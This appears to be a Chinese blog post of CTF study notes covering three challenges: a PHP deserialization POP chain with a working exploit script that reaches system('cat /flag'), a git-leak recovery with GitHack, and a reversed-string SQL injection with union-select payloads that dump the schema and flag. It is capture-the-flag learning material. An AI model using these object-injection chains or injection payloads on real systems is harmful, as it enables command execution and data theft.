5.24学习记录

[FSCTF 2023]ez_php2

比较简单的pop链

<?php
highlight_file(__file__);
Class Rd{
    public $ending;
    public $cl;

    public $poc;
    public function __destruct()
    {
        echo "All matters have concluded";
        die($this->ending);
    }
    public function __call($name, $arg)
    {
        foreach ($arg as $key =>$value)
        {

            if($arg[0]['POC']=="1111")
            {
                echo "1";
                $this->cl->var1 = "system";
            }
        }
    }
}


class Poc{
    public $payload;

    public $fun;

    public function __set($name, $value)
    {
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?";
        file_get_contents($paylaod);
    }
}

class Er{
    public $symbol;
    public $Flag;

    public function __construct()
    {
        $this->symbol = True;
    }

    public function __set($name, $value)
    {
        $value($this->Flag);
    }


} 

确定链尾,反推pop链 ,主要还是区分set和call的触发条件,来调用魔术方法

最终的链子

Ha __destr-> Rd __call -> Er __set

最终的代码

<?php
class Rd{
    public $ending;
    public $cl;
    public $poc;
}
class Poc{
    public $payload = ['POC'=>'1111'];
    public $fun;
}
class Er{
    public $symbol;
    public $Flag;
}
class Ha{
    public $start;
    public $start1;
    public $start2;
}
$a = new Ha;
$b = new Poc;
$a->start2 = "11111";
$a->start1 = new Rd;
$a->start = $b->payload;
$a->start1->cl = new Er;
$a->start1->cl->Flag = 'cat /flag';
echo serialize($a);

 [NCTF 2018]全球最大交友网站

git泄露

git show一下就行

dirsearch扫描一下,发现git

用githack clone一下

git log

git show,给了一个提示和假flag

告诉了flag应该在tag==1.0的commit里面,但是我直接把三个commit查看了一遍就找到了

 [UUCTF 2022 新生赛]ezsql

进入靶场,看见登录框,尝试SQL注入

 存在sql注入,应该是两个地方都存在注入点,那么进行闭合

很奇怪注释符跑前面去了,用一个字符串试试

哦,是倒序了,用脚本把sql语句进行倒序排列

import base64

strA = input()
strB = strA[::-1]

print(strB)

爆字段数没有回显,看了wp发现or被过滤了,那么可以用group by来爆,也可以用union select来尝试(这里是两列)

#2,1 tceles noinu )'1-

爆库名(这里如果是在usename进行的注入,就把回显位放在1上)

#2,)(esabatad tceles noinu )'1-

爆表

#'FTCUU'=amehcs_elbat erehw selbat.amehcs_noitamrofni moorrf )eman_elbat(tacnoc_puoorrg,1 tceles noinu )'1-

爆字段

#'galf'=eman_elbat erehw snmuloc.amehcs_noitamrofni moorrf )eman_nmuloc(tacnoc_puoorrg,1 tceles noinu )'1-

查询字段内容

#galf moorrf )FTCUU(tacnoc_puoorrg,1 tceles noinu )'1-

 

相关推荐

  1. 学习记录————

    2024-05-25 21:34:58       66 阅读
  2. mysql学习记录

    2024-05-25 21:34:58       42 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-25 21:34:58       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-25 21:34:58       101 阅读
  3. 在Django里面运行非项目文件

    2024-05-25 21:34:58       82 阅读
  4. Python语言-面向对象

    2024-05-25 21:34:58       91 阅读

热门阅读

  1. 通关!游戏设计之道Day14

    2024-05-25 21:34:58       36 阅读
  2. python 多线程处理图片

    2024-05-25 21:34:58       32 阅读
  3. unity 制作app实现底部导航栏和顶部状态栏

    2024-05-25 21:34:58       38 阅读
  4. 什么是js

    2024-05-25 21:34:58       31 阅读
  5. 怎么使Ajax设为同步和异步

    2024-05-25 21:34:58       34 阅读
  6. C:技术面试总结

    2024-05-25 21:34:58       35 阅读
  7. Android NDK系列(二)NativeActivity工作流程

    2024-05-25 21:34:58       37 阅读
  8. OSI七层模型和TCP/IP四层模型的区别

    2024-05-25 21:34:58       28 阅读
  9. 什么是高精度定位平板?

    2024-05-25 21:34:58       33 阅读